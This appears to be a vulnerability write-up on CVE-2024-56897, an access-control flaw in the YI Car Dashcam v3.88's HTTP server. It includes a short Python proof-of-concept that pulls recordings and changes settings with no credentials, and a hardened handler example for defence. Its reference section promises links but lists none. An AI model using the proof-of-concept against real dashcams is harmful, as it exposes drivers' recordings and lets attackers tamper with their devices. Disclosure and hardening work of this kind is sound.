This post discusses CVE-2024-56897, a critical vulnerability in the YI Car Dashcam v3.88. The issue arises from improper access control in the device's built-in HTTP server, which allows unrestricted file downloads, file uploads, and API commands. As a consequence, an attacker on the same network can read recordings, change device settings, disable recording, disable sounds, and trigger a factory reset, all without authorization. We will go through the exploit details, show a code snippet that illustrates the flaw, and point to the original reports.
Exploit Details
The YI Car Dashcam v3.88 is a popular dashboard camera that provides users with video recording capabilities during car rides. The device has a built-in HTTP server for easy communication between the device and the user's phone. However, the implemented access control is weak, which enables attackers to exploit this vulnerability.
The improper access control in the HTTP server allows an attacker to send API requests without authorization, leading to:
1. Unrestricted file downloads - Download any file from the device.
2. Unrestricted file uploads - Upload a malicious file to the device, which could compromise the device further.
3. Unauthorized API commands - Perform various unauthorized actions, such as disabling recordings, disabling sounds, or performing a factory reset.
Below is a Python script that demonstrates how this vulnerability is exploited:
import requests

TARGET_IP = "192.168.1.XXX"
API_BASE = f"http://{TARGET_IP}:80"

# Download a video file from the device; no credentials are sent at any point
def download_video(date, filename):
    url = f"{API_BASE}/records/{date}/{filename}.mp4"
    response = requests.get(url, timeout=10)
    if response.status_code == 200:
        with open(f"{filename}.mp4", "wb") as f:
            f.write(response.content)

# Change settings on the device, e.g., disable sounds; a plain GET with no authentication
def change_settings(key, value):
    url = f"{API_BASE}/settings?{key}={value}"
    response = requests.get(url, timeout=10)
    print(response.text)

# Example usage
download_video("2021-01-01", "001")
change_settings("sound", "")
In this example, the script downloads a video file and disables the sound without presenting any credentials: the server never checks who is calling, and state-changing operations are reachable through plain GET requests.
Original References
The vulnerability was initially discovered by an independent researcher and reported to the company. Below are the links to the original references:
Mitigation and Conclusion
It is essential for YI Car Dashcam users, especially those running v3.88, to take the necessary steps to mitigate the risks associated with this vulnerability. YI Technologies should release an updated firmware version with proper access control in the HTTP server. In the meantime, users should protect the Wi-Fi network the dashcam joins with a strong password and limit which devices can reach it, since anyone on that network can currently reach the unauthenticated API.
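To make "proper access control" concrete, here is an added example (not code from the post or from YI) of the weak handler pattern the post describes beside a hardened one. The routes mirror the post's /settings?key=value and /records/ endpoints; the pairing-token mechanism, the record naming scheme and the device state are assumptions constructed for the example.

```python
import hmac
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample device state; the secret stands in for a value set at pairing time.
def fresh_state():
    return {"settings": {"sound": "on", "recording": "on"}, "secret": "pairing-token-example"}

# Assumed record naming scheme: /records/YYYY-MM-DD/NNN.mp4
RECORD_RE = re.compile(r"^/records/(\d{4}-\d{2}-\d{2})/(\d{3})\.mp4$")

def weak_handle(method, path, headers, state):
    """Weak pattern: GET /settings?key=value mutates state; no caller check at all."""
    parsed = urlparse(path)
    if parsed.path == "/settings":
        for key, values in parse_qs(parsed.query).items():
            state["settings"][key] = values[0]       # any key, any client, any method
        return 200, "ok"
    if parsed.path.startswith("/records/"):
        return 200, "file:" + parsed.path           # any path under /records/, any client
    return 404, "not found"

def hardened_handle(method, path, headers, state):
    """Hardened: every route needs the pairing token; changes need POST and a known key."""
    parsed = urlparse(path)
    token = headers.get("X-Pairing-Token", "")
    # Constant-time comparison against the pairing secret (assumed mechanism, not YI's).
    # A bearer token alone is replayable on an open LAN; a real design would add TLS or
    # a nonce-bound signature, omitted here to keep the example short.
    if not hmac.compare_digest(token, state["secret"]):
        return 401, "unauthorized"
    if parsed.path == "/settings":
        if method != "POST":                         # GET must never change state
            return 405, "method not allowed"
        updates = {k: v[0] for k, v in parse_qs(parsed.query).items()}
        if not set(updates) <= set(state["settings"]):  # allow-list of known keys
            return 400, "unknown setting"
        state["settings"].update(updates)
        return 200, "ok"
    m = RECORD_RE.fullmatch(parsed.path)             # rejects traversal and arbitrary paths
    if m:
        return 200, f"file:/records/{m.group(1)}/{m.group(2)}.mp4"
    return 404, "not found"
```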
In summary, CVE-2024-56897 in YI Car Dashcam v3.88 poses a significant threat to user privacy and device integrity. Because the HTTP server enforces no access control, attackers on the same network can read files, upload content, and manipulate device settings. It is crucial for YI Technologies to address this issue in firmware, and for users to take the precautions above until a fix is available.
Timeline
Published on: 02/24/2025 16:15:12 UTC
Last modified on: 03/03/2025 20:15:43 UTC